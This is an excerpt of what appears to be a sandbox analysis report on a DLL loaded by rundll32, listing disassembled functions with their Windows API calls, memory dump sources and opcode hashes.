                                                                                                                      • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                      • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                      • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                      • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                      • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                      • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      • Opcode ID: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction ID: 7ba363369691fc6b3f3751fa7a143ae8cdd8f79096e01733c6a63758ec2ecc69
                                                                                                                      • Opcode Fuzzy Hash: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction Fuzzy Hash: A601C072500219FBEB00DF648D85FAF73BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                      • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                      • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                      • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                      • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                      • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                      • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                      • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(00AC1550), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
